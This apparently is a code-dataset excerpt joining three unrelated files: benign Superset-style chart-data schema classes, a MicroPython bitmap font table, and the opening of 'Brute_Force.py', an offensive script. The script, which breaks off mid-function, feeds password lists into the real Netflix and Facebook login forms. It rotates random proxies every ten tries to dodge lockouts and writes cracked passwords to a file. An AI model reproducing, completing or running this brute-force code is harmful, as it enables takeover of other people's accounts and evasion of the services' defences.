min=0,
max=1,
min_inclusive=False,
max_inclusive=False,
error=_("`confidence_interval` must be between 0 and 1 (exclusive)"),
)
],
example=0.8,
required=True,
)
yearly_seasonality = fields.Raw(
# TODO: add correct union type once supported by Marshmallow
description="Should yearly seasonality be applied. "
"An integer value will specify Fourier order of seasonality, `None` will "
"automatically detect seasonality.",
example=False,
)
weekly_seasonality = fields.Raw(
# TODO: add correct union type once supported by Marshmallow
description="Should weekly seasonality be applied. "
"An integer value will specify Fourier order of seasonality, `None` will "
"automatically detect seasonality.",
example=False,
)
monthly_seasonality = fields.Raw(
# TODO: add correct union type once supported by Marshmallow
description="Should monthly seasonality be applied. "
"An integer value will specify Fourier order of seasonality, `None` will "
"automatically detect seasonality.",
example=False,
)
class ChartDataBoxplotOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Boxplot operation config.
"""
groupby = fields.List(
fields.String(description="Columns by which to group the query.",),
allow_none=True,
)
metrics = fields.List(
fields.Raw(),
description="Aggregate expressions. Metrics can be passed as both "
"references to datasource metrics (strings), or ad-hoc metrics"
"which are defined only within the query object. See "
"`ChartDataAdhocMetricSchema` for the structure of ad-hoc metrics.",
)
whisker_type = fields.String(
description="Whisker type. Any numpy function will work.",
validate=validate.OneOf(
choices=([val.value for val in PostProcessingBoxplotWhiskerType])
),
required=True,
example="tukey",
)
percentiles = fields.Tuple(
(
fields.Float(
description="Lower percentile",
validate=[
Range(
min=0,
max=100,
min_inclusive=False,
max_inclusive=False,
error=_(
"lower percentile must be greater than 0 and less "
"than 100. Must be lower than upper percentile."
),
),
],
),
fields.Float(
description="Upper percentile",
validate=[
Range(
min=0,
max=100,
min_inclusive=False,
max_inclusive=False,
error=_(
"upper percentile must be greater than 0 and less "
"than 100. Must be higher than lower percentile."
),
),
],
),
),
description="Upper and lower percentiles for percentile whisker type.",
example=[1, 99],
)
class ChartDataPivotOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Pivot operation config.
"""
index = (
fields.List(
fields.String(
allow_none=False,
description="Columns to group by on the table index (=rows)",
),
minLength=1,
required=True,
),
)
columns = fields.List(
fields.String(
allow_none=False, description="Columns to group by on the table columns",
),
)
metric_fill_value = fields.Number(
description="Value to replace missing values with in aggregate calculations.",
)
column_fill_value = fields.String(
description="Value to replace missing pivot columns names with."
)
drop_missing_columns = fields.Boolean(
description="Do not include columns whose entries are all missing "
"(default: `true`).",
)
marginal_distributions = fields.Boolean(
description="Add totals for row/column. (default: `false`)",
)
marginal_distribution_name = fields.String(
description="Name of marginal distribution row/column. (default: `All`)",
)
aggregates = ChartDataAggregateConfigField()
class ChartDataGeohashDecodeOptionsSchema(
ChartDataPostProcessingOperationOptionsSchema
):
"""
Geohash decode operation config.
"""
geohash = fields.String(
description="Name of source column containing geohash string", required=True,
)
latitude = fields.String(
description="Name of target column for decoded latitude", required=True,
)
longitude = fields.String(
description="Name of target column for decoded longitude", required=True,
)
class ChartDataGeohashEncodeOptionsSchema(
ChartDataPostProcessingOperationOptionsSchema
):
"""
Geohash encode operation config.
"""
latitude = fields.String(
description="Name of source latitude column", required=True,
)
longitude = fields.String(
description="Name of source longitude column", required=True,
)
geohash = fields.String(
description="Name of target column for encoded geohash string", required=True,
)
class ChartDataGeodeticParseOptionsSchema(
ChartDataPostProcessingOperationOptionsSchema
):
"""
Geodetic point string parsing operation config.
"""
geodetic = fields.String(
description="Name of source column containing geodetic point strings",
required=True,
)
latitude = fields.String(
description="Name of target column for decoded latitude", required=True,
)
longitude = fields.String(
description="Name of target column for decoded longitude", required=True,
)
altitude = fields.String(
description="Name of target column for decoded altitude. If omitted, "
"altitude information in geodetic string is ignored.",
)
class ChartDataPostProcessingOperationSchema(Schema):
operation = fields.String(
description="Post processing operation type",
required=True,
validate=validate.OneOf(
choices=(
"aggregate",
"boxplot",
"contribution",
"cum",
"geodetic_parse",
"geohash_decode",
"geohash_encode",
"pivot",
"prophet",
"rolling",
"select",
"sort",
"diff",
"compare",
)
),
example="aggregate",
)
options = fields.Dict(
description="Options specifying how to perform the operation. Please refer "
"to the respective post processing operation option schemas. "
"For example, `ChartDataPostProcessingOperationOptions` specifies "
"the required options for the pivot operation.",
example={
"groupby": ["country", "gender"],
"aggregates": {
"age_q1": {
"operator": "percentile",
"column": "age",
"options": {"q": 0.25},
},
"age_mean": {"operator": "mean", "column": "age",},
},
},
)
class ChartDataFilterSchema(Schema):
col = fields.String(
description="The column to filter.", required=True, example="country"
)
op = fields.String( # pylint: disable=invalid-name
description="The comparison operator.",
validate=utils.OneOfCaseInsensitive(
choices=[filter_op.value for filter_op in FilterOperator]
),
required=True,
example="IN",
)
val = fields.Raw(
description="The value or values to compare against. Can be a string, "
"integer, decimal or list, depending on the operator.",
example=["China", "France", "Japan"],
)
class ChartDataExtrasSchema(Schema):
time_range_endpoints = fields.List(EnumField(TimeRangeEndpoint, by_value=True))
relative_start = fields.String(
description="Start time for relative time deltas. "
'Default: `config["DEFAULT_RELATIVE_START_TIME"]`',
validate=validate.OneOf(choices=("today", "now")),
)
relative_end = fields.String(
description="End time for relative time deltas. "
'Default: `config["DEFAULT_RELATIVE_START_TIME"]`',
validate=validate.OneOf(choices=("today", "now")),
)
where = fields.String(
description="WHERE clause to be added to queries using AND operator.",
)
having = fields.String(
description="HAVING clause to be added to aggregate queries using "
"AND operator.",
)
having_druid = fields.List(
fields.Nested(ChartDataFilterSchema),
description="HAVING filters to be added to legacy Druid datasource queries.",
)
time_grain_sqla = fields.String(
description="To what level of granularity should the temporal column be "
"aggregated. Supports "
"[ISO 8601](https://en.wikipedia.org/wiki/ISO_8601#Durations) durations.",
validate=validate.OneOf(
choices=[
i
for i in {**builtin_time_grains, **config["TIME_GRAIN_ADDONS"]}.keys()
if i
]
),
example="P1D",
allow_none=True,
)
druid_time_origin = fields.String(
description="Starting point for time grain counting on legacy Druid "
"datasources. Used to change e.g. Monday/Sunday first-day-of-week.",
allow_none=True,
)
class AnnotationLayerSchema(Schema):
annotationType = fields.String(
description="Type of annotation layer",
validate=validate.OneOf(choices=[ann.value for ann in AnnotationType]),
)
color = fields.String(description="Layer color", allow_none=True,)
descriptionColumns = fields.List(
fields.String(),
description="Columns to use as the description. If none are provided, "
"all will be shown.",
)
hideLine = fields.Boolean(
description="Should line be hidden. Only applies to line annotations",
allow_none=True,
)
intervalEndColumn = fields.String(
description=(
"Column containing end of interval. Only applies to interval layers"
),
allow_none=True,
)
name = fields.String(description="Name of layer", required=True)
opacity = fields.String(
description="Opacity of layer",
validate=validate.OneOf(
choices=("", "opacityLow", "opacityMedium", "opacityHigh"),
),
allow_none=True,
required=False,
)
overrides = fields.Dict(
keys=fields.String(
desciption="Name of property to be overridden",
validate=validate.OneOf(
choices=("granularity", "time_grain_sqla", "time_range", "time_shift"),
),
),
values=fields.Raw(allow_none=True),
description="which properties should be overridable",
allow_none=True,
)
show = fields.Boolean(description="Should the layer be shown", required=True)
showMarkers = fields.Boolean(
description="Should markers be shown. Only applies to line annotations.",
required=True,
)
sourceType = fields.String(
description="Type of source for annotation data",
validate=validate.OneOf(choices=("", "line", "NATIVE", "table",)),
)
style = fields.String(
description="Line style. Only applies to time-series annotations",
validate=validate.OneOf(choices=("dashed", "dotted", "solid", "longDashed",)),
)
timeColumn = fields.String(
description="Column with event date or interval start date", allow_none=True,
)
titleColumn = fields.String(description="Column with title", allow_none=True,)
width = fields.Float(
description="Width of annotation line",
validate=[
Range(
min=0,
min_inclusive=True,
error=_("`width` must be greater or equal to 0"),
)
],
)
value = fields.Raw(
description="For formula annotations, this contains the formula. "
"For other types, this is the primary key of the source object.",
required=True,
)
class ChartDataDatasourceSchema(Schema):
description = "Chart datasource"
id = fields.Integer(description="Datasource id", required=True,)
type = fields.String(
description="Datasource type",
validate=validate.OneOf(choices=("druid", "table")),
)
class ChartDataQueryObjectSchema(Schema):
class Meta: # pylint: disable=too-few-public-methods
unknown = EXCLUDE
datasource = fields.Nested(ChartDataDatasourceSchema, allow_none=True)
result_type = EnumField(ChartDataResultType, by_value=True, allow_none=True)
annotation_layers = fields.List(
fields.Nested(AnnotationLayerSchema),
description="Annotation layers to apply to chart",
allow_none=True,
)
applied_time_extras = fields.Dict(
description="A mapping of temporal extras that have been applied to the query",
allow_none=True,
example={"__time_range": "1 year ago : now"},
)
apply_fetch_values_predicate = fields.Boolean(
description="Add fetch values predicate (where clause) to query "
"if defined in datasource",
allow_none=True,
)
filters = fields.List(fields.Nested(ChartDataFilterSchema), allow_none=True)
granularity = fields.String(
description="Name of temporal column used for time filtering. For legacy Druid "
"datasources this defines the time grain.",
allow_none=True,
)
granularity_sqla = fields.String(
description="Name of temporal column used for time filtering for SQL "
"datasources. This field is deprecated, use `granularity` "
"instead.",
allow_none=True,
deprecated=True,
)
groupby = fields.List(
fields.String(description="Columns by which to group the query.",),
allow_none=True,
)
metrics = fields.List(
fields.Raw(),
description="Aggregate expressions. Metrics can be passed as both "
"references to datasource metrics (strings), or ad-hoc metrics"
"which are defined only within the query object. See "
"`ChartDataAdhocMetricSchema` for the structure of ad-hoc metrics.",
allow_none=True,
)
post_processing = fields.List(
fields.Nested(ChartDataPostProcessingOperationSchema, allow_none=True),
allow_none=True,
description="Post processing operations to be applied to the result set. "
"Operations are applied to the result set in sequential order.",
)
time_range = fields.String(
description="A time rage, either expressed as a colon separated string "
"`since : until` or human readable freeform. Valid formats for "
"`since` and `until` are: \n"
"- ISO 8601\n"
"- X days/years/hours/day/year/weeks\n"
"- X days/years/hours/day/year/weeks ago\n"
"- X days/years/hours/day/year/weeks from now\n"
"\n"
"Additionally, the following freeform can be used:\n"
"\n"
"- Last day\n"
"- Last week\n"
"- Last month\n"
"- Last quarter\n"
"- Last year\n"
"- No filter\n"
"- Last X seconds/minutes/hours/days/weeks/months/years\n"
"- Next X seconds/minutes/hours/days/weeks/months/years\n",
example="Last week",
allow_none=True,
)
time_shift = fields.String(
description="A human-readable date/time string. "
"Please refer to [parsdatetime](https://github.com/bear/parsedatetime) "
"documentation for details on valid values.",
allow_none=True,
)
is_timeseries = fields.Boolean(
description="Is the `query_object` a timeseries.", allow_none=True,
)
timeseries_limit = fields.Integer(
description="Maximum row count for timeseries queries. Default: `0`",
allow_none=True,
)
timeseries_limit_metric = fields.Raw(
description="Metric used to limit timeseries queries by.", allow_none=True,
)
row_limit = fields.Integer(
description='Maximum row count (0=disabled). Default: `config["ROW_LIMIT"]`',
allow_none=True,
validate=[
Range(min=0, error=_("`row_limit` must be greater than or equal to 0"))
],
)
row_offset = fields.Integer(
description="Number of rows to skip. Default: `0`",
allow_none=True,
validate=[
Range(min=0, error=_("`row_offset` must be greater than or equal to 0"))
],
)
order_desc = fields.Boolean(
description="Reverse order. Default: `false`", allow_none=True,
)
extras = fields.Nested(
ChartDataExtrasSchema,
description="Extra parameters to add to the query.",
allow_none=True,
)
columns = fields.List(
fields.String(),
description="Columns which to select in the query.",
allow_none=True,
)
orderby = fields.List(
fields.Tuple(
(
fields.Raw(
validate=[
Length(min=1, error=_("orderby column must be populated"))
],
allow_none=False,
),
fields.Boolean(),
)
),
description="Expects a list of lists where the first element is the column "
"name which to sort by, and the second element is a boolean.",
allow_none=True,
example=[("my_col_1", False), ("my_col_2", True)],
)
where = fields.String(
description="WHERE clause to be added to queries using AND operator."
"This field is deprecated and should be passed to `extras`.",
allow_none=True,
deprecated=True,
)
having = fields.String(
description="HAVING clause to be added to aggregate queries using "
"AND operator. This field is deprecated and should be passed "
"to `extras`.",
allow_none=True,
deprecated=True,
)
having_filters = fields.List(
fields.Nested(ChartDataFilterSchema),
description="HAVING filters to be added to legacy Druid datasource queries. "
"This field is deprecated and should be passed to `extras` "
"as `having_druid`.",
allow_none=True,
deprecated=True,
)
druid_time_origin = fields.String(
description="Starting point for time grain counting on legacy Druid "
"datasources. Used to change e.g. Monday/Sunday first-day-of-week. "
"This field is deprecated and should be passed to `extras` "
"as `druid_time_origin`.",
allow_none=True,
)
url_params = fields.Dict(
description="Optional query parameters passed to a dashboard or Explore view",
keys=fields.String(description="The query parameter"),
values=fields.String(description="The value of the query parameter"),
allow_none=True,
)
is_rowcount = fields.Boolean(
description="Should the rowcount of the actual query be returned",
allow_none=True,
)
time_offsets = fields.List(fields.String(), allow_none=True,)
class ChartDataQueryContextSchema(Schema):
datasource = fields.Nested(ChartDataDatasourceSchema)
queries = fields.List(fields.Nested(ChartDataQueryObjectSchema))
force = fields.Boolean(
description="Should the queries be forced to load from the source. "
"Default: `false`",
)
result_type = EnumField(ChartDataResultType, by_value=True)
result_format = EnumField(ChartDataResultFormat, by_value=True)
# pylint: disable=no-self-use,unused-argument
@post_load
def make_query_context(self, data: Dict[str, Any], **kwargs: Any) -> QueryContext:
query_context = QueryContext(**data)
return query_context
# pylint: enable=no-self-use,unused-argument
class AnnotationDataSchema(Schema):
columns = fields.List(
fields.String(),
description="columns available in the annotation result",
required=True,
)
records = fields.List(
fields.Dict(keys=fields.String(),),
description="records mapping the column name to it's value",
required=True,
)
class ChartDataResponseResult(Schema):
annotation_data = fields.List(
fields.Dict(
keys=fields.String(description="Annotation layer name"),
values=fields.String(),
),
description="All requested annotation data",
allow_none=True,
)
cache_key = fields.String(
description="Unique cache key for query object", required=True, allow_none=True,
)
cached_dttm = fields.String(
description="Cache timestamp", required=True, allow_none=True,
)
cache_timeout = fields.Integer(
description="Cache timeout in following order: custom timeout, datasource "
"timeout, default config timeout.",
required=True,
allow_none=True,
)
error = fields.String(description="Error", allow_none=True,)
is_cached = fields.Boolean(
description="Is the result cached", required=True, allow_none=None,
)
query = fields.String(
description="The executed query statement", required=True, allow_none=False,
)
status = fields.String(
description="Status of the query",
validate=validate.OneOf(
choices=(
"stopped",
"failed",
"pending",
"running",
"scheduled",
"success",
"timed_out",
)
),
allow_none=False,
)
stacktrace = fields.String(
desciption="Stacktrace if there was an error", allow_none=True,
)
rowcount = fields.Integer(
description="Amount of rows in result set", allow_none=False,
)
data = fields.List(fields.Dict(), description="A list with results")
applied_filters = fields.List(
fields.Dict(), description="A list with applied filters"
)
rejected_filters = fields.List(
fields.Dict(), description="A list with rejected filters"
)
class ChartDataResponseSchema(Schema):
result = fields.List(
fields.Nested(ChartDataResponseResult),
description="A list of results for each corresponding query in the request.",
)
class ChartDataAsyncResponseSchema(Schema):
channel_id = fields.String(
description="Unique session async channel ID", allow_none=False,
)
job_id = fields.String(description="Unique async job ID", allow_none=False,)
user_id = fields.String(description="Requesting user ID", allow_none=True,)
status = fields.String(description="Status value for async job", allow_none=False,)
result_url = fields.String(
description="Unique result URL for fetching async query data", allow_none=False,
)
class ChartFavStarResponseResult(Schema):
id = fields.Integer(description="The Chart id")
value = fields.Boolean(description="The FaveStar value")
class GetFavStarIdsSchema(Schema):
result = fields.List(
fields.Nested(ChartFavStarResponseResult),
description="A list of results for each corresponding chart in the request",
)
class ImportV1ChartSchema(Schema):
slice_name = fields.String(required=True)
viz_type = fields.String(required=True)
params = fields.Dict()
query_context = fields.Dict()
cache_timeout = fields.Integer(allow_none=True)
uuid = fields.UUID(required=True)
version = fields.String(required=True)
dataset_uuid = fields.UUID(required=True)
CHART_SCHEMAS = (
ChartDataQueryContextSchema,
ChartDataResponseSchema,
ChartDataAsyncResponseSchema,
# TODO: These should optimally be included in the QueryContext schema as an `anyOf`
# in ChartDataPostPricessingOperation.options, but since `anyOf` is not
# by Marshmallow<3, this is not currently possible.
ChartDataAdhocMetricSchema,
ChartDataAggregateOptionsSchema,
ChartDataContributionOptionsSchema,
ChartDataProphetOptionsSchema,
ChartDataBoxplotOptionsSchema,
ChartDataPivotOptionsSchema,
ChartDataRollingOptionsSchema,
ChartDataSelectOptionsSchema,
ChartDataSortOptionsSchema,
ChartDataGeohashDecodeOptionsSchema,
ChartDataGeohashEncodeOptionsSchema,
ChartDataGeodeticParseOptionsSchema,
ChartEntityResponseSchema,
ChartGetDatasourceResponseSchema,
ChartCacheScreenshotResponseSchema,
GetFavStarIdsSchema,
)
| 35.042776 | 88 | 0.633977 |
795bb78867340afa17dd66d6c6e39d13a275458e | 5,987 | py | Python | fonts/svga141_8x14.py | ccccmagicboy/st7735_mpy | b15f1bde69fbe6e0eb4931c57e71c136d8e7f024 | [
"MIT"
] | 6 | 2020-07-11T16:59:19.000Z | 2021-07-16T19:32:49.000Z | ports/esp32/user_modules/st7735_mpy/fonts/svga141_8x14.py | d4niele/micropython | a1f7b37d392bf46b28045ce215ae899fda8d8c38 | [
"MIT"
] | 1 | 2020-04-14T03:14:45.000Z | 2020-04-14T03:14:45.000Z | fonts/svga141_8x14.py | ccccmagicboy/st7735_mpy | b15f1bde69fbe6e0eb4931c57e71c136d8e7f024 | [
"MIT"
] | null | null | null | """converted from ..\fonts\SVGA141__8x14.bin """
WIDTH = 8
HEIGHT = 14
FIRST = 0x20
LAST = 0x7f
_FONT =\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x18\x3c\x3c\x3c\x18\x18\x00\x18\x18\x00\x00\x00'\
b'\x00\x66\x66\x66\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x6c\x6c\xfe\x6c\x6c\x6c\xfe\x6c\x6c\x00\x00\x00'\
b'\x18\x18\x7c\xc6\xc2\xc0\x7c\x06\x86\xc6\x7c\x18\x18\x00'\
b'\x00\x00\x00\x00\xc2\xc6\x0c\x18\x30\x66\xc6\x00\x00\x00'\
b'\x00\x00\x38\x6c\x6c\x38\x76\xdc\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x30\x30\x30\x60\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x0c\x18\x30\x30\x30\x30\x30\x18\x0c\x00\x00\x00'\
b'\x00\x00\x30\x18\x0c\x0c\x0c\x0c\x0c\x18\x30\x00\x00\x00'\
b'\x00\x00\x00\x00\x66\x3c\xff\x3c\x66\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x18\x18\x7e\x18\x18\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x18\x18\x18\x30\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\xfe\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x18\x00\x00\x00'\
b'\x00\x00\x02\x06\x0c\x18\x30\x60\xc0\x80\x00\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xce\xde\xf6\xe6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x18\x38\x78\x18\x18\x18\x18\x18\x7e\x00\x00\x00'\
b'\x00\x00\x7c\xc6\x06\x0c\x18\x30\x60\xc6\xfe\x00\x00\x00'\
b'\x00\x00\x7c\xc6\x06\x06\x3c\x06\x06\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x0c\x1c\x3c\x6c\xcc\xfe\x0c\x0c\x1e\x00\x00\x00'\
b'\x00\x00\xfe\xc0\xc0\xc0\xfc\x06\x06\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x38\x60\xc0\xc0\xfc\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xfe\xc6\x06\x0c\x18\x30\x30\x30\x30\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\x7c\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\x7e\x06\x06\x0c\x78\x00\x00\x00'\
b'\x00\x00\x00\x18\x18\x00\x00\x00\x18\x18\x00\x00\x00\x00'\
b'\x00\x00\x00\x18\x18\x00\x00\x00\x18\x18\x30\x00\x00\x00'\
b'\x00\x00\x06\x0c\x18\x30\x60\x30\x18\x0c\x06\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7e\x00\x00\x7e\x00\x00\x00\x00\x00'\
b'\x00\x00\x60\x30\x18\x0c\x06\x0c\x18\x30\x60\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\x0c\x18\x18\x00\x18\x18\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xde\xde\xde\xdc\xc0\x7c\x00\x00\x00'\
b'\x00\x00\x10\x38\x6c\xc6\xc6\xfe\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x66\x66\x66\xfc\x00\x00\x00'\
b'\x00\x00\x3c\x66\xc2\xc0\xc0\xc0\xc2\x66\x3c\x00\x00\x00'\
b'\x00\x00\xf8\x6c\x66\x66\x66\x66\x66\x6c\xf8\x00\x00\x00'\
b'\x00\x00\xfe\x66\x62\x68\x78\x68\x62\x66\xfe\x00\x00\x00'\
b'\x00\x00\xfe\x66\x62\x68\x78\x68\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x3c\x66\xc2\xc0\xc0\xde\xc6\x66\x3a\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xfe\xc6\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x3c\x18\x18\x18\x18\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\x1e\x0c\x0c\x0c\x0c\x0c\xcc\xcc\x78\x00\x00\x00'\
b'\x00\x00\xe6\x66\x6c\x6c\x78\x6c\x6c\x66\xe6\x00\x00\x00'\
b'\x00\x00\xf0\x60\x60\x60\x60\x60\x62\x66\xfe\x00\x00\x00'\
b'\x00\x00\xc6\xee\xfe\xfe\xd6\xc6\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xc6\xe6\xf6\xfe\xde\xce\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x38\x6c\xc6\xc6\xc6\xc6\xc6\x6c\x38\x00\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x60\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\xc6\xd6\xde\x7c\x0c\x0e\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x6c\x66\x66\xe6\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\x60\x38\x0c\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x7e\x7e\x5a\x18\x18\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xc6\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xc6\xc6\x6c\x38\x10\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xd6\xd6\xfe\x7c\x6c\x00\x00\x00'\
b'\x00\x00\xc6\xc6\x6c\x38\x38\x38\x6c\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x66\x66\x66\x66\x3c\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\xfe\xc6\x8c\x18\x30\x60\xc2\xc6\xfe\x00\x00\x00'\
b'\x00\x00\x3c\x30\x30\x30\x30\x30\x30\x30\x3c\x00\x00\x00'\
b'\x00\x00\x80\xc0\xe0\x70\x38\x1c\x0e\x06\x02\x00\x00\x00'\
b'\x00\x00\x3c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x3c\x00\x00\x00'\
b'\x10\x38\x6c\xc6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00'\
b'\x30\x30\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x78\x0c\x7c\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x00\xe0\x60\x60\x78\x6c\x66\x66\x66\x7c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xc0\xc0\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x1c\x0c\x0c\x3c\x6c\xcc\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xfe\xc0\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x38\x6c\x64\x60\xf0\x60\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x76\xcc\xcc\xcc\x7c\x0c\xcc\x78\x00'\
b'\x00\x00\xe0\x60\x60\x6c\x76\x66\x66\x66\xe6\x00\x00\x00'\
b'\x00\x00\x18\x18\x00\x38\x18\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\x06\x06\x00\x0e\x06\x06\x06\x06\x66\x66\x3c\x00'\
b'\x00\x00\xe0\x60\x60\x66\x6c\x78\x6c\x66\xe6\x00\x00\x00'\
b'\x00\x00\x38\x18\x18\x18\x18\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xec\xfe\xd6\xd6\xd6\xc6\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xdc\x66\x66\x66\x66\x66\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xdc\x66\x66\x66\x7c\x60\x60\xf0\x00'\
b'\x00\x00\x00\x00\x00\x76\xcc\xcc\xcc\x7c\x0c\x0c\x1e\x00'\
b'\x00\x00\x00\x00\x00\xdc\x76\x66\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\x70\x1c\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x10\x30\x30\xfc\x30\x30\x30\x36\x1c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xcc\xcc\xcc\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x66\x66\x66\x66\x3c\x18\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\xc6\xd6\xd6\xfe\x6c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\x6c\x38\x38\x6c\xc6\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\xc6\xc6\xc6\x7e\x06\x0c\xf8\x00'\
b'\x00\x00\x00\x00\x00\xfe\xcc\x18\x30\x66\xfe\x00\x00\x00'\
b'\x00\x00\x0e\x18\x18\x18\x70\x18\x18\x18\x0e\x00\x00\x00'\
b'\x00\x00\x18\x18\x18\x18\x00\x18\x18\x18\x18\x00\x00\x00'\
b'\x00\x00\x70\x18\x18\x18\x0e\x18\x18\x18\x70\x00\x00\x00'\
b'\x00\x00\x76\xdc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x10\x38\x6c\xc6\xc6\xfe\x00\x00\x00\x00'\
FONT = memoryview(_FONT)
| 57.019048 | 60 | 0.704359 |
795bb886c8972d63b1627377334b014c09f72c8c | 11,426 | py | Python | core/Brute_Force.py | Ankesh054-official/LittleBrother-GUI- | db1f338109b756a78c2fb142a9f7a5263aef3c12 | [
"MIT"
] | 16 | 2020-09-16T09:10:43.000Z | 2022-02-17T02:19:54.000Z | core/Brute_Force.py | swagkarna/LittleBrother-GUI- | 73bfca36c3c0640b9c59c135ca1877e84449bf77 | [
"MIT"
] | 1 | 2020-12-24T02:06:26.000Z | 2021-01-14T05:50:08.000Z | core/Brute_Force.py | Ankesh054-official/LittleBrother-GUI- | db1f338109b756a78c2fb142a9f7a5263aef3c12 | [
"MIT"
] | 4 | 2020-09-16T14:00:47.000Z | 2021-01-04T04:16:23.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import smtplib
import threading
from optparse import *
import time
try :
from proxylist import ProxyList
except:
print("pip3 install proxylist ")
try :
from mechanize import Browser
except:
print("pip3 install mechanize")
from os import *
from tkinter import *
from tkinter.ttk import Progressbar
from tkinter import filedialog
import sys
import logging
import io
import random
try:
import cookielib
except:
import http.cookiejar as cookielib
try:
import mechanize
except:
print("pip3 install mechanize ")
#Coding Function Proxy 0xAbdullah
def proxy():
logging.basicConfig()
pl = ProxyList()
try:
pl.load_file(proxyList)
except:
sys.exit('[!] Proxy File format has incorrect | EXIT...')
pl.random()
getProxy = pl.random().address()
brows.set_proxies(proxies={"https": getProxy})
try:
checkProxyIP = brows.open("https://api.ipify.org/?format=raw", timeout=10)
except:
return proxy()
def Netflix():
password_list = io.open(options.filedialog.askdirectory(),"r").readlines()
try_login = 0
print("\r Netflix Account: {}".format(options.netflix))
print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s"%(R,W))
for password in password_list:
password = password.rstrip('\n')
try_login += 1
if try_login == 10:
try_login = 0
proxy()
print('\rPassword [==] {} '.format(password).rstrip("\n"))
sys.stdout.flush
url = "https://www.netflix.com/sa/login"
try:
brows.open(url, timeout=10)
brows.select_form(nr=0)
brows.form['userLoginId'] = options.netflix
brows.form['password'] = password
brows.method = "POST"
submit = brows.submit()
if 'https://www.netflix.com/browse' in submit.geturl():
print("{}[True][+] Password Found [{}][+]".format(G,password))
Save = io.open("Netflix.txt","a").write("Account Netflix:"+options.netflix+"\t\tPassword:"+password+"\n")
break
else :
print("%s[!] False Login Password%s\n"%(R,W))
except:
print('[!] <<<There are speeches in Communication>>> \n')
proxy()
def facebook(brows):
password_list = io.open(filedialog.askdirectory(),"r").readlines()
try_login = 0
print("\rFacebook Account: {}".format(facebook))
print("<<<<<<+++++Start Attacking Email+++++>>>>>")
for password in password_list:
password = password.rstrip('\n')
try_login += 1
if try_login == 10:
try_login = 0
proxy()
print('\rPassword [==] {} '.format(password).rstrip("\n"))
sys.stdout.flush
url = "https://ar-ar.facebook.com/login"
try:
brows.open(url, timeout=5)
brows.select_form(nr=0)
brows.form['email'] = facebook
brows.form['pass'] = password
brows.method = "POST"
submit = brows.submit()
if 'https://www.facebook.com/?sk=welcome' in submit.geturl():
print("[True][+] Password Found [{}]".format(password))
